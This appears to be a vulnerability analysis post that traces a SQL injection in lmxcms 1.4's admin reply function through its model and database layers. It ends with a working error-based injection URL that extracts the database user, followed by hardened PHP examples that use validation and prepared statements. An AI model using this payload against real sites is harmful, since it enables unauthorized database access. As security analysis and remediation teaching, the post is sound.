The vulnerability notice only says that the backend file Bo***.cl***.php contains a SQL injection. The only backend file whose name starts with "bo" is BookAction.class.php. So how do we locate the injection point inside BookAction.class.php?

To find an injection point, the first thing to look at is the parameters and the variables that receive them.

```php
public function reply(){
    // id is taken straight from the request: GET first, otherwise POST
    $id = $_GET['id'] ? $_GET['id'] : $_POST['id'];
    // fetch the reply data for this id
    $reply = $this->bookModel->getReply(array($id));
    if($reply){
        $reply = string::html_char($reply[0]['content']);
        $this->smarty->assign('content',$reply);
        $this->smarty->assign('type','update');
    }else{
        $this->smarty->assign('type','add');
    }
    if(isset($_POST['reply'])){
        if(!$_POST['content']){
            rewrite::js_back('回复内容不能为空');
        }
        $this->bookModel->reply(array('id'=>$id,'type'=>$_POST['type'],'username'=>$this->username));
        addlog('留言回复【id:'.$_POST['id'].'】');
        rewrite::succ('修改成功','?m=Book');
    }
    $this->smarty->assign('id',$id);
    $this->smarty->display('Book/reply.html');
}
```

Only the variable id is clearly received from the request; where the other variables are read is not obvious, so id is examined first. To decide whether a variable is injectable we have to look at the SQL statement it ends up in, but reply() contains no SQL. So we follow id into getReply, the function it is passed to, and check whether that function performs any database operation.

Following getReply leads to F:\phpstudy\phpstudy_pro\WWW\lmxcms1.4\m\BookModel.class.php

```php
// get all replies for the given message ids
public function getReply(array $id){
    // the raw id values are joined and concatenated directly into the WHERE clause
    $id = implode(',',$id);
    $param['where'] = 'uid in('.$id.')';
    return parent::selectModel($param);
}
```

getReply still contains no SQL statement, so we continue to selectModel in F:\phpstudy\phpstudy_pro\WWW\lmxcms1.4\class\Model.class.php

```php
// fetch data
protected function selectModel($param=array()){
    if($param['field']){
        $this->field=$param['field'];
    }
    // $param (including the where string built above) is passed through unchanged
    return parent::selectDB($this->tab['0'],$this->field,$param);
}
```

selectModel still contains no SQL statement either, so we continue to selectDB in F:\phpstudy\phpstudy_pro\WWW\lmxcms1.4\class\db.class.php

```php
protected function selectDB($tab,Array $field,$param=array()){
    $arr = array();
    $field = implode(',',$field);
    $force = '';
    // force or ignore a specific index
    if($param['force']) $force = ' force index('.$param['force'].')';
    if($param['ignore']) $force = ' ignore index('.$param['ignore'].')';
    // where() turns $param['where'] into the WHERE clause text
    $sqlStr = $this->where($param);
    $sql="SELECT $field FROM ".DB_PRE."$tab$force $sqlStr";
    $result=$this->query($sql);
    while(!!$a=mysql_fetch_assoc($result)){
        $arr[]=$a;
    }
    $this->result($result);
    return $arr;
}
```

selectDB is where the SQL statement finally appears: `$sql="SELECT $field FROM ".DB_PRE."$tab$force $sqlStr";`. Adding `echo $sql;` right after that line prints the statement that is actually executed, which makes it easy to confirm how the id value lands in it.

Having located the injection point, construct the request: http://127.0.0.1/lmxcms1.4/admin.php?m=Book&a=reply&id=1, where m=Book routes to BookAction.class.php and a=reply selects the reply method; the statement executes successfully.

payload: http://127.0.0.1/lmxcms1.4/admin.php?m=Book&a=reply&id=1) and updatexml(0,concat(0x7e,user()),1)%23, which successfully returns the database user.
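As an added example (not lmxcms code and not part of the original post), the where-clause construction from getReply() next to two hardened forms: one keeps the string-building style but only lets integer ids through, the other uses PDO placeholders so the ids never touch the SQL text. The PDO connection, table name and function names are assumptions for illustration.

```php
<?php
// Added example, not lmxcms code. Contrasts the vulnerable where-clause
// construction traced above with two hardened versions.

// Mirrors the original flow: raw request values are imploded into SQL text.
function vulnerableWhere(array $ids): string {
    return 'uid in(' . implode(',', $ids) . ')';
}

// Hardened form 1: same string-building style, but every id must be a
// plain digit string. Anything else is rejected before reaching the SQL.
function safeWhere(array $ids): string {
    $clean = [];
    foreach ($ids as $id) {
        if (!is_int($id) && !is_string($id)) {
            throw new InvalidArgumentException('id must be a scalar');
        }
        if (!preg_match('/^\d{1,10}$/', (string)$id)) {
            throw new InvalidArgumentException('id must be a positive integer');
        }
        $clean[] = (int)$id;
    }
    if ($clean === []) {
        throw new InvalidArgumentException('at least one id is required');
    }
    return 'uid in(' . implode(',', $clean) . ')';
}

// Hardened form 2 (assumed PDO connection and table name): one placeholder
// per id, values bound separately, so the SQL text is fixed at prepare time.
function getReplyPrepared(PDO $pdo, string $table, array $ids): array {
    $clean = array_map('intval', $ids);
    if ($clean === []) {
        return [];   // avoid an empty IN () which is a syntax error
    }
    $marks = implode(',', array_fill(0, count($clean), '?'));
    $stmt = $pdo->prepare("SELECT id, content FROM {$table} WHERE uid IN ({$marks})");
    $stmt->execute($clean);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs shaped like the reply() id parameter.
$good = ['1'];
echo vulnerableWhere($good), "\n";
echo safeWhere($good), "\n";

$malformed = ['1)abc'];                 // constructed non-numeric value
echo vulnerableWhere($malformed), "\n"; // the input becomes part of the SQL text
try {
    safeWhere($malformed);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

The original code relies on the mysql_* extension, which was removed in PHP 7, so the PDO form is also the practical migration path rather than only a hardening step.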